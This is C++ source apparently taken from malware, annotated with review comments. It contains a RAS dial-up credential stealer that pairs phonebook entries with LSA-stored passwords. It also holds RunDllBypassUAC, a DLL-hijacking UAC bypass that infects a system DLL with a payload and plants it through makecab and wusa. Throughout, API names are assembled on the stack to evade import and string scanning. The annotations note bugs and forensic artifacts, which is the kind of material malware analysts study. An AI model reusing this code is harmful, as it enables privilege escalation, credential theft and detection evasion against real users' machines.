/// Counts the RAS phonebook entries visible to the current user.
///
/// Two candidate rasphone.pbk files are probed: the per-user one under
/// "Documents and Settings\<m_lpCurrentUser>\Application Data\..." and the
/// shared one under CSIDL 0x23 (CSIDL_COMMON_APPDATA). Each section name
/// returned by GetPrivateProfileSectionNamesA counts as one entry.
///
/// Detection note: every Win32 API used here is resolved at call time via
/// GetProcAddress, with most names assembled as stack char arrays, so the
/// import table and a plain string scan of the binary do not show them.
/// The LoadLibrary calls are never paired with FreeLibrary.
///
/// @return Total number of section names found across both phonebook files
///         (an int accumulator implicitly widened to DWORD).
DWORD CDialupass::GetRasEntryCount()
{
    int nCount = 0;
    char *lpPhoneBook[2];
    char szPhoneBook1[MAX_PATH+1], szPhoneBook2[MAX_PATH+1];
    GetWindowsDirectoryAT pGetWindowsDirectoryA=(GetWindowsDirectoryAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetWindowsDirectoryA");
    pGetWindowsDirectoryA(szPhoneBook1, sizeof(szPhoneBook1));
    // API name built on the stack (see header note); same pattern below.
    char FBwWp22[] = {'l','s','t','r','c','p','y','A','\0'};
    lstrcpyAT plstrcpyA=(lstrcpyAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp22);
    // Overwrites everything after the first backslash of the Windows
    // directory (e.g. "C:\WINDOWS" -> "C:\Documents and Settings\").
    // NOTE(review): my_strchr's result is used without a NULL check.
    plstrcpyA(Gyfunction->my_strchr(szPhoneBook1, '\\') + 1, "Documents and Settings\\");
    char DmDjm01[] = {'l','s','t','r','c','a','t','A','\0'};
    lstrcatAT plstrcatA=(lstrcatAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DmDjm01);
    // m_lpCurrentUser is a member declared outside this view; presumably the
    // profile name whose phonebook is being read.
    plstrcatA(szPhoneBook1, m_lpCurrentUser);
    plstrcatA(szPhoneBook1, "\\Application Data\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk");
    char CtxPW39[] = {'S','H','G','e','t','S','p','e','c','i','a','l','F','o','l','d','e','r','P','a','t','h','A','\0'};
    SHGetSpecialFolderPathAT pSHGetSpecialFolderPathA=(SHGetSpecialFolderPathAT)GetProcAddress(LoadLibrary("SHELL32.dll"),CtxPW39);
    // 0x23 == CSIDL_COMMON_APPDATA; return value is not checked.
    pSHGetSpecialFolderPathA(NULL,szPhoneBook2, 0x23, 0);
    char DQeBW01[] = {'%','s','\\','%','s','\0'};
    char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'};
    wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50);
    // NOTE(review): szPhoneBook2 is both the output buffer and a %s source;
    // the buffers overlap, which the wsprintf contract does not allow.
    pwsprintfA(szPhoneBook2,DQeBW01, szPhoneBook2, "Microsoft\\Network\\Connections\\pbk\\rasphone.pbk");
    lpPhoneBook[0] = szPhoneBook1;
    lpPhoneBook[1] = szPhoneBook2;
    DWORD nSize = 1024 * 4;
    char *lpszReturnBuffer = new char[nSize];
    char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'};
    lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01);
    // NOTE(review): the divisor is sizeof(int), not sizeof(lpPhoneBook[0]),
    // so the iteration count depends on the pointer size of the build rather
    // than on the two-element array.
    for (int i = 0; i < sizeof(lpPhoneBook) / sizeof(int); i++)
    {
        memset(lpszReturnBuffer, 0, nSize);
        GetPrivateProfileSectionNamesAT pGetPrivateProfileSectionNamesA=(GetPrivateProfileSectionNamesAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetPrivateProfileSectionNamesA");
        pGetPrivateProfileSectionNamesA(lpszReturnBuffer, nSize, lpPhoneBook[i]);
        // Section names come back as a double-NUL-terminated list; walk it
        // string by string.
        for(char *lpSection = lpszReturnBuffer; *lpSection != '\0'; lpSection += plstrlenA(lpSection) + 1)
        {
            nCount++;
        }
    }
    // NOTE(review): allocated with new[] but released with scalar delete.
    delete lpszReturnBuffer;
    return nCount;
}
//------------------------------------------------------------------------
/// Returns the name of the loader's signal file, built as
/// "<system drive>:" + LoaderSignalFileName (LoaderSignalFileName and
/// STR::New are declared outside this view).
///
/// @return Newly built string from STR::New, or NULL if
///         pGetWindowsDirectoryA fails.
PCHAR GetSignalFileName()
{
    // Determine the system drive from the Windows directory.
    char WinDir[257];
    if (pGetWindowsDirectoryA(&WinDir[0], 256) == 0)
        return NULL;
    // Truncate right after the drive colon, leaving e.g. "C:".
    // NOTE(review): the scan has no bound; it relies on a ':' being present.
    PCHAR Tmp = WinDir;
    while (*Tmp != ':') Tmp++;
    Tmp++;
    *Tmp = 0;
    // Build the full name.
    return STR::New(2, WinDir, (PCHAR)LoaderSignalFileName);
}
/// Writes the MD5 hex digest of "<drive>:\ntldr" into Buffer.
///
/// The Windows directory is truncated after its third character, so the
/// path is assumed to start with a drive letter and backslash ("C:\").
/// `string` here is the project's own type (IsEmpty/t_str), not std::string.
///
/// @param Buffer      Caller-owned output buffer; zeroed first.
/// @param BufferSize  Size of Buffer in bytes; must be at least 33
///                    (presumably 32 hex digits plus the terminator).
/// @return Buffer on success, NULL if the digest is empty or Buffer is too
///         small. Note that Buffer is zeroed even on the NULL paths.
char* CalcNtldrMd5(char* Buffer, DWORD BufferSize)
{
    CHAR path[MAX_PATH];
    pGetWindowsDirectoryA(path, MAX_PATH);
    path[3] = '\0';
    m_lstrcat(path, "ntldr");
    m_memset(Buffer, 0, BufferSize);
    string md5 = MD5StrFromFileA(path);
    if (md5.IsEmpty()) return NULL;
    // The size check happens after the file read; the read is wasted when
    // Buffer is too small.
    if (BufferSize < 33) return NULL;
    m_lstrcat(Buffer, md5.t_str());
    return Buffer;
}
/// Attempts the DLL-hijacking UAC bypass the comments below describe, using
/// the tables uacTargetDll/uacTargetMsu/uacTargetDir/uacTargetApp (declared
/// outside this view) indexed by `method`.
///
/// Only Windows 6.1 and 6.2 pass the version gate. No range check is done on
/// `method`; the caller must pass a valid index.
///
/// Forensic artifacts this function leaves while running: a temp file from
/// File::GetTempName holding `module`, a modified copy of the target DLL and
/// a .msu in the temp directory, child processes makecab.exe and
/// "wusa.exe ... /extract" under cmd.exe, then the target application.
/// All temp files and the extracted DLL are deleted before returning.
///
/// @param module    In-memory image of the payload DLL.
/// @param szModule  Size of `module` in bytes.
/// @param method    Index into the uacTarget* tables.
/// @return true only if the executed target reports
///         UAC_BYPASS_MAGIC_RETURN_CODE; false on any earlier failure.
bool RunDllBypassUAC( const LPVOID module, int szModule, int method )
{
    bool ret = false;
    // Check whether we are on the required Windows version.
    OSVERSIONINFOA Version;
    Version.dwOSVersionInfoSize = sizeof(OSVERSIONINFOA);
    if( pGetVersionExA(&Version) )
    {
        // Note: if GetVersionExA itself fails, the gate is skipped entirely.
        if( Version.dwPlatformId != VER_PLATFORM_WIN32_NT || Version.dwMajorVersion != 6 || !(Version.dwMinorVersion == 1 || Version.dwMinorVersion == 2) )
        {
            return false;
        }
    }
    char engineDll[MAX_PATH];
    File::GetTempName(engineDll);
    DBG( "Saving engine DLL into the '%s'", engineDll );
    // write payload DLL into the temporary location
    if( File::WriteBufferA( engineDll, module, szModule ) != szModule )
        return false;
    char targetDll[MAX_PATH], targetDllInfected[MAX_PATH];
    pGetSystemDirectoryA( targetDll, MAX_PATH );
    pPathAppendA( targetDll, uacTargetDll[method] );
    pGetTempPathA( MAX_PATH, targetDllInfected );
    pPathAppendA( targetDllInfected, uacTargetDll[method] );
    void* data = NULL;
    DWORD dataSize = 0;
    DBG( "Reading and infecting '%s'", targetDll );
    // read hijacking dll and infect it
    data = File::ReadToBufferA( targetDll, dataSize );
    if( data )
    {
        if( InfectImage( data, dataSize, engineDll, 0 ) )
        {
            DBG( "Saving infected DLL to '%s'", targetDllInfected);
            // write infected hijacking DLL into the temporary location
            if( File::WriteBufferA( targetDllInfected, data, dataSize ) )
            {
                char msuPath[MAX_PATH];
                pGetTempPathA( MAX_PATH, msuPath );
                pPathAppendA( msuPath, uacTargetMsu[method] );
                // delete old .msu file
                pDeleteFileA(msuPath);
                DBG( "Creating MSU file '%s'", msuPath);
                // make .msu archive
                // The Exec result is ignored; success is judged by the
                // IsExists check that follows.
                Exec( 0, "makecab.exe /V1 %s %s", targetDllInfected, msuPath);
                if( File::IsExists(msuPath) )
                {
                    char targetPath[MAX_PATH], targetDllPath[MAX_PATH];
                    pGetWindowsDirectoryA( targetPath, MAX_PATH - 1 );
                    pPathAppendA( targetPath, uacTargetDir[method] );
                    pPathAppendA( targetPath, uacTargetApp[method] );
                    pGetWindowsDirectoryA( targetDllPath, MAX_PATH - 1 );
                    pPathAppendA( targetDllPath, uacTargetDir[method] );
                    pPathAppendA( targetDllPath, uacTargetDll[method] );
                    DBG( "Extracting MSU data to '%s'", targetDllPath );
                    // extract dll file into the vulnerable app directory
                    Exec(NULL, "cmd.exe /C wusa.exe %s /extract:%%WINDIR%%\\%s", msuPath, uacTargetDir[method] );
                    if( File::IsExists(targetDllPath) )
                    {
                        DWORD exitCode = 0;
                        DBG( "Executing '%s'", targetPath );
                        // execute vulnerable application and perform DLL hijacking attack
                        if( Exec( &exitCode, "cmd.exe /C %s", targetPath ) )
                        {
                            if( exitCode == UAC_BYPASS_MAGIC_RETURN_CODE )
                            {
                                DBG( "UAC BYPASS SUCCESS" );
                                ret = true;
                            }
                            else
                            {
                                DBG( "UAC BYPASS FAILS" );
                            }
                        }
                        // Remove the extracted DLL regardless of outcome.
                        pDeleteFileA(targetDllPath);
                    }
                    else
                        DBG( "Error while extracting '%s' from MSU archive", targetDllPath );
                    pDeleteFileA(msuPath);
                }
                else
                    DBG( "Error while creating '%s'", msuPath );
            }
        }
        MemFree(data);
    }
    // Cleanup of the temp copies runs on every path past the payload write.
    pDeleteFileA(targetDllInfected);
    pDeleteFileA(engineDll);
    return ret;
}
/// Enumerates RAS phonebook entries and records each one via Set(...),
/// joining the entry's DialParamsUID against the m_PassWords table that
/// GetLsaPasswords() fills (both members declared outside this view).
///
/// The phonebook paths are built exactly as in GetRasEntryCount(): the
/// per-user rasphone.pbk under "Documents and Settings\<m_lpCurrentUser>"
/// and the shared one under CSIDL 0x23 (CSIDL_COMMON_APPDATA).
///
/// Detection note: Win32 APIs are resolved at call time through
/// GetProcAddress with names assembled as stack char arrays, so neither the
/// import table nor a plain string scan shows them. The LoadLibrary calls
/// are never paired with FreeLibrary.
///
/// @return Always true.
bool CDialupass::GetRasEntries()
{
    // NOTE(review): nCount is never used in this function.
    int nCount = 0;
    char *lpPhoneBook[2];
    char szPhoneBook1[MAX_PATH+1], szPhoneBook2[MAX_PATH+1];
    GetWindowsDirectoryAT pGetWindowsDirectoryA=(GetWindowsDirectoryAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetWindowsDirectoryA");
    pGetWindowsDirectoryA(szPhoneBook1, sizeof(szPhoneBook1));
    // API name built on the stack (see header note); same pattern below.
    char FBwWp22[] = {'l','s','t','r','c','p','y','A','\0'};
    lstrcpyAT plstrcpyA=(lstrcpyAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp22);
    // Overwrites everything after the first backslash of the Windows
    // directory (e.g. "C:\WINDOWS" -> "C:\Documents and Settings\").
    // NOTE(review): my_strchr's result is used without a NULL check.
    plstrcpyA(Gyfunction->my_strchr(szPhoneBook1, '\\') + 1, "Documents and Settings\\");
    char DmDjm01[] = {'l','s','t','r','c','a','t','A','\0'};
    lstrcatAT plstrcatA=(lstrcatAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DmDjm01);
    plstrcatA(szPhoneBook1, m_lpCurrentUser);
    plstrcatA(szPhoneBook1, "\\Application Data\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk");
    char CtxPW39[] = {'S','H','G','e','t','S','p','e','c','i','a','l','F','o','l','d','e','r','P','a','t','h','A','\0'};
    SHGetSpecialFolderPathAT pSHGetSpecialFolderPathA=(SHGetSpecialFolderPathAT)GetProcAddress(LoadLibrary("SHELL32.dll"),CtxPW39);
    // 0x23 == CSIDL_COMMON_APPDATA; return value is not checked.
    pSHGetSpecialFolderPathA(NULL,szPhoneBook2, 0x23, 0);
    char DQeBW01[] = {'%','s','\\','%','s','\0'};
    char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'};
    wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50);
    // NOTE(review): szPhoneBook2 is both the output buffer and a %s source;
    // the buffers overlap, which the wsprintf contract does not allow.
    pwsprintfA(szPhoneBook2,DQeBW01, szPhoneBook2, "Microsoft\\Network\\Connections\\pbk\\rasphone.pbk");
    lpPhoneBook[0] = szPhoneBook1;
    lpPhoneBook[1] = szPhoneBook2;
    OSVERSIONINFO osi;
    osi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
    char FBwWp05[] = {'G','e','t','V','e','r','s','i','o','n','E','x','A','\0'};
    GetVersionExAT pGetVersionExA=(GetVersionExAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp05);
    pGetVersionExA(&osi);
    // Credential lookup is only attempted on NT-family 5.x and later; the
    // GetVersionExA return value itself is not checked.
    if(osi.dwPlatformId == VER_PLATFORM_WIN32_NT && osi.dwMajorVersion >= 5)
    {
        GetLsaPasswords();
    }
    DWORD nSize = 1024 * 4;
    char *lpszReturnBuffer = new char[nSize];
    char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'};
    lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01);
    // NOTE(review): the divisor is sizeof(int), not sizeof(lpPhoneBook[0]),
    // so the iteration count depends on the pointer size of the build rather
    // than on the two-element array.
    for (int i = 0; i < sizeof(lpPhoneBook) / sizeof(int); i++)
    {
        memset(lpszReturnBuffer, 0, nSize);
        GetPrivateProfileSectionNamesAT pGetPrivateProfileSectionNamesA=(GetPrivateProfileSectionNamesAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetPrivateProfileSectionNamesA");
        pGetPrivateProfileSectionNamesA(lpszReturnBuffer, nSize, lpPhoneBook[i]);
        // Section names come back as a double-NUL-terminated list; walk it
        // string by string.
        for(char *lpSection = lpszReturnBuffer; *lpSection != '\0'; lpSection += plstrlenA(lpSection) + 1)
        {
            // UTF8ToGB2312 is a project helper; ownership of what it returns
            // is not visible here (the deletes at the end are commented out).
            char *lpRealSection = (char *)UTF8ToGB2312(lpSection);
            char strDialParamsUID[256];
            char strUserName[256];
            char strPassWord[256];
            char strPhoneNumber[256];
            char strDevice[256];
            memset(strDialParamsUID, 0, sizeof(strDialParamsUID));
            memset(strUserName, 0, sizeof(strUserName));
            memset(strPassWord, 0, sizeof(strPassWord));
            memset(strPhoneNumber, 0, sizeof(strPhoneNumber));
            memset(strDevice, 0, sizeof(strDevice));
            char FBwWp04[] = {'G','e','t','P','r','i','v','a','t','e','P','r','o','f','i','l','e','S','t','r','i','n','g','A','\0'};
            GetPrivateProfileStringAT pGetPrivateProfileStringA=(GetPrivateProfileStringAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp04);
            int nBufferLen = pGetPrivateProfileStringA(lpSection, "DialParamsUID", 0, strDialParamsUID, sizeof(strDialParamsUID), lpPhoneBook[i]);
            char FBwWp03[] = {'l','s','t','r','c','m','p','A','\0'};
            lstrcmpAT plstrcmpA=(lstrcmpAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp03);
            if (nBufferLen > 0)//DialParamsUID=4326020 198064
            {
                // Linear match of this entry's UID against the collected
                // m_PassWords records; first hit wins and is marked used.
                for(int j=0; j< (int)m_nRasCount; j++)
                {
                    if(plstrcmpA(strDialParamsUID, m_PassWords[j].UID)==0)
                    {
                        plstrcpyA(strUserName, m_PassWords[j].login);
                        plstrcpyA(strPassWord, m_PassWords[j].pass);
                        m_PassWords[j].used=true;
                        m_nUsed++;
                        break;
                    }
                }
            }
            // NOTE(review): both reads pass sizeof(strDialParamsUID) as the
            // size of a different buffer; harmless only because all five
            // buffers are the same size.
            pGetPrivateProfileStringA(lpSection, "PhoneNumber", 0, strPhoneNumber, sizeof(strDialParamsUID), lpPhoneBook[i]);
            pGetPrivateProfileStringA(lpSection, "Device", 0, strDevice, sizeof(strDialParamsUID), lpPhoneBook[i]);
            char *lpRealDevice = (char *)UTF8ToGB2312(strDevice);
            char *lpRealUserName = (char *)UTF8ToGB2312(strUserName);
            Set(strDialParamsUID, lpRealSection, lpRealUserName, strPassWord, strPhoneNumber, lpRealDevice);
            // delete lpRealSection;
            // delete lpRealUserName;
            // delete lpRealDevice;
        }
    }
    // NOTE(review): allocated with new[] but released with scalar delete.
    delete lpszReturnBuffer;
    return true;
}